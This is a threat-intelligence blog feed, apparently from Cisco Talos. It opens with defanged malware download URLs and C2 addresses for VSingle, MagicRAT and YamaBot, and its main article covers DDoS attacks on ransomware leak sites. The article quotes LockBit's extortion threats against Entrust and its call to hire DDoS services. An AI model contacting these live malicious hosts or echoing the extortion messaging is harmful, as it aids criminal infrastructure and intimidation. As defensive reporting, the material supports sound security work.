hxxp[://]185[.]29[.]8[.]162:443/1[.]tmp
hxxp[://]40[.]121[.]90[.]194/11[.]jpg
hxxp[://]40[.]121[.]90[.]194/300dr[.]cert
hxxp[://]40[.]121[.]90[.]194/b[.]cert
hxxp[://]40[.]121[.]90[.]194/qq[.]cert
hxxp[://]40[.]121[.]90[.]194/ra[.]cert
hxxp[://]40[.]121[.]90[.]194/Rar[.]jpg
hxxp[://]40[.]121[.]90[.]194/tt[.]rar
hxxp[://]46[.]183[.]221[.]109//dfdfdfdfdfdfdfdfdfaflakjdfljaldjfladfljaldkfjlajdsflajdskf/huntertroy[.]exe
hxxp[://]46[.]183[.]221[.]109//dfdfdfdfdfdfdfdfdfaflakjdfljaldjfladfljaldkfjlajdsflajdskf/svhostw[.]exe
hxxp[://]84[.]38[.]133[.]145/board[.]html
hxxp[://]84[.]38[.]133[.]145/header[.]xml
hxxp[://]www[.]ajoa[.]org/home/manager/template/calendar[.]php
hxxp[://]www[.]ajoa[.]org/home/rar[.]tmp
hxxp[://]www[.]ajoa[.]org/home/tmp[.]ps1
hxxp[://]www[.]ajoa[.]org/home/ztt[.]tmp
hxxp[://]www[.]orvi00[.]com/ez/admin/shop/powerline[.]tmp

VSingle C2s

hxxps[://]tecnojournals[.]com/review
hxxps[://]semiconductboard[.]com/xml
hxxp[://]cyancow[.]com/find

MagicRAT C2s

hxxp[://]155[.]94[.]210[.]11/news/page[.]php
hxxp[://]192[.]186[.]183[.]133/bbs/board[.]php
hxxp[://]213[.]32[.]46[.]0/board[.]php
hxxp[://]54[.]68[.]42[.]4/mainboard[.]php
hxxp[://]84[.]38[.]133[.]145/apollom/jeus[.]php
hxxp[://]mudeungsan[.]or[.]kr/gbbs/bbs/template/g_botton[.]php
hxxp[://]www[.]easyview[.]kr/board/Kheader[.]php
hxxp[://]www[.]easyview[.]kr/board/mb_admin[.]php

YamaBot C2s

hxxp[://]213[.]180[.]180[.]154/editor/session/aaa000/support[.]php








Talos EMEA Monthly Threat Update: How do you know if cyber insurance is right for you?

8 September 2022 at 09:00

On September's edition of the Monthly EMEA Threat Update, Hazel Burton and Martin Lee break down cyber insurance.

Although many businesses and organizations will think insurance will only help them in a worst-case scenario, that worst-case scenario comes for us all eventually.

Martin and Hazel discuss the benefits of having a cyber insurance policy and how it protects the policy holder when a cyber attacks strike. You can watch the full episode above or over on our YouTube page here.

Multiple ransomware data leak sites experience DDoS attacks, facing intermittent outages and connectivity issues

7 September 2022 at 15:00
By Azim Khodjibaev, Colin Grady, Paul Eubanks.

  • Since Aug. 20, 2022, Cisco Talos has been monitoring suspected distributed denial-of-service (DDoS) attacks resulting in intermittent downtime and outages affecting several ransomware-as-a-service (RaaS) data leak sites.
  • While the source and origin of this activity remain unknown, this appears to be a concentrated effort against RaaS leak sites to disrupt their efforts to announce and post new victim information.
  • Actors' responses have varied, with LockBit and ALPHV implementing new measures to counteract DDoS attacks against their sites while other groups like Quantum have simply resorted to redirecting web traffic elsewhere. LockBit also appears to have co-opted this technique by advertising that they are now adding DDoS as an extortion tactic in addition to encrypting and leaking data.

RaaS leak sites experience intermittent outages


In late August, Talos became aware of several prominent ransomware operations, such as ALPHV (also referred to as BlackCat) and LockBit, experiencing suspected DDoS attacks against their public data leak sites. These leak sites are typically hosted on Tor hidden services where, in a tactic known as double extortion, RaaS affiliates post victim information if the ransom demand is not met. On Aug. 26, we also observed at least seven more RaaS leak sites for LV, Hive, Everest, BianLian, Yanluowang, Snatch and Lorenz become inaccessible and go offline intermittently and/or experience slow traffic. Security researchers have also identified additional RaaS leak sites for Ragnar Locker and Vice Society which may have also been affected by this activity. However, we have only verified the Ragnar Locker claim at this time, as their leak site continues to experience outages. At the time of analysis, many of the aforementioned groups are still affected by connectivity issues and continue to face a variety of intermittent outages to their data leak sites, including frequent disconnects and unreachable hosts, suggesting that this is part of a sustained effort to thwart updates to those sites.

On Aug. 20, a LockBit representative, "LockBitSupp", reported that nearly 1,000 servers were targeting the LockBit data leak sites, with nearly 400 requests per second. After reporting that their leak sites became unavailable due to a DDoS attack, LockBit provided screenshots alleging that the attack began as soon as they started to publish data to their leak site for Entrust, a digital security company LockBit targeted in July.
LockBit representative "LockBitSupp" reports on DDoS attack against LockBit.

Translation:
Almost 1000 servers are targeting me, logs shows 400 requests a second on each domain, f** expenses

On Aug. 23, in another forum post by LockBitSupp, they claimed that this was the worst DDoS attack the site experienced in three years, indicating that the effects were significant.
LockBit representative commenting on DDoS attack impact.
Translation:
Kurisu: actually its pretty funny that the 'number 1 locker' can be held offline for 5 or how many days...not the best reputation 

LockBitSupp: only the blogs and victim chats were held down a bit, nothing serious, the panel is working as always, because the links to it are not known by anyone. In 3 years, this is the first time I got DDoSed this hard, there is no sense in it, only hypes us up more, over 50 people from all over the world wrote to me in Tox with an offer to help with different things

In the same timeframe, we identified that ALPHV, another high-profile ransomware group, was also experiencing similar connectivity issues with their leak site. On Aug. 26, they publicly denied they were being DDoSed, claiming they were unsure and that the sites were not available. Talos also observed unconfirmed chatter that ALPHV was on vacation at this time.
ALPHV ransomware group responds to claims of DDoS.

Translation:
unknown: who DDoSed you?

ALPHV: Hello, no one DDoSed us

unknown: how? didn't your blog go offline for a few days?

ALPHV: I was not here during this time, but seems like it wasn't a DDoS

Talos soon identified that ALPHV was among the ransomware groups affected, who quickly began to respond by adding additional website protections to their leak site.

It is important to note that we have not observed RaaS customer or victim interaction sites affected by this activity, meaning that victim interactions and monetary payments can still take place. Several of the RaaS leak sites continue to appear to be offline intermittently, suggesting that this activity may be meant to disrupt and sow discord among RaaS operators and affiliates by interfering with attempts to post victim data to their respective sites. The possibility that these disruptions may be coming from a competitor or bring about unwanted law enforcement attention could create tension among some of the affected ransomware groups. The motivation and source of this activity still remains unknown, but given the limited timeframe and number of affected RaaS operators, it appears to be a concerted effort against RaaS data leak sites to disrupt efforts to announce and post new victim information. This activity is only affecting the data leak sites and not the ability to conduct ransomware operations, as it is hindering the ability for these ransomware affiliates and operators to post new victim information publicly.

RaaS response


Talos has observed that some of the RaaS operations affected by this activity have quickly responded by implementing increased protections and measures to minimize outages from DDoS attacks.

On Aug. 22, following the initial round of DDoS attacks against their site, LockBitSupp claimed they were enhancing existing DDoS protections on their site. In another forum post on Aug. 23, LockBitSupp announced that LockBit was now looking to add DDoS as a third extortion tactic on top of encrypting and leaking data. Few ransomware groups use DDoS attacks, and LockBit's adoption of the technique could appeal to operators and possibly help drive up future recruitment efforts.
LockBitSupp claiming updated protections to LockBit's leak site.

Translation:
Unknown: how was your weekend

LockBitSupp: hello, normal weekend, got motivated by ddos and now standing up 100500 mirrors and modernizing. not just a life but a party! its was boring before :-)

Below is LockBit's official response following the DDoS attacks.
LockBit's official response following DDoS attacks.

Translation:
1. What doesn't kill you, only makes you stronger. We are strengthening the infrastructure, increasing the number of mirrors that mirror servers, and new ddos protections.

2. Please recommend a site where I can order ddos services against these stingy guys (or maybe someone local here does this? the site is entrust[.]com), that put in $5,000,000 and were ready to pay $1,000,000.

3. Access to them was not bought, they got accessed through a 0day

4. I'm loading all of their info (300gb) into a torrent seed, soon I'll share it with everyone who wants it in private in tox, and then will share the torrent link publicly.

5. We have already implemented the url randomization inside the ransomware, there will be a unique url generated within each locker build, which will not be detected by the DDoSer.

6. Developing a bulletproof storage system on the clearnet for all companies in addition to the tor ones.

7. Looking for a team of DDoSers, apparently we are now going to attack targets and offer triple extortion, encryption, data leak + ddos...now that i have felt the power of ddos and how refreshing and interesting it makes life

Entrust, thank you for the motivation, you are making us stronger, but you will remain a hollow and stingy firm as you have been, and in a few days the whole world will know all of your secrets, if I were you I would pay before it is too late, we'd destroy your information, because so far no one has been able to download it due to the ddos.
Shortly after, ALPHV also started implementing more robust anti-scrape technology to their leak site, an approach taken that appears to reduce the load of DDoS attacks and could be a component of added DDoS protections.
ALPHV implementations to their data leak site.

In this same timeframe, Talos identified that the Quantum ransomware operation had recently started to redirect traffic issued to their data leak blogs (both on the clear web and on TOR hidden services network) back to the localhost computer which made the web request, with the following response: "HTTP/1.1 301 Moved Permanently." This likely indicates that they understand there are active DDoS attempts directed against their site, although this traffic redirection didn't allow their site to continue serving traffic. Compared to LockBit's approach, this response may speak to a slightly more amateur skill level, suggesting limitations in Quantum's capabilities to respond to a DDoS attack by properly filtering attack traffic, while allowing their website to continue to respond to legitimate traffic.

Given that this activity is continuing to interrupt and hinder the ability for these affiliates and operators to post new victim information publicly, we will likely continue to see various groups respond differently depending on the resources available to them.


❌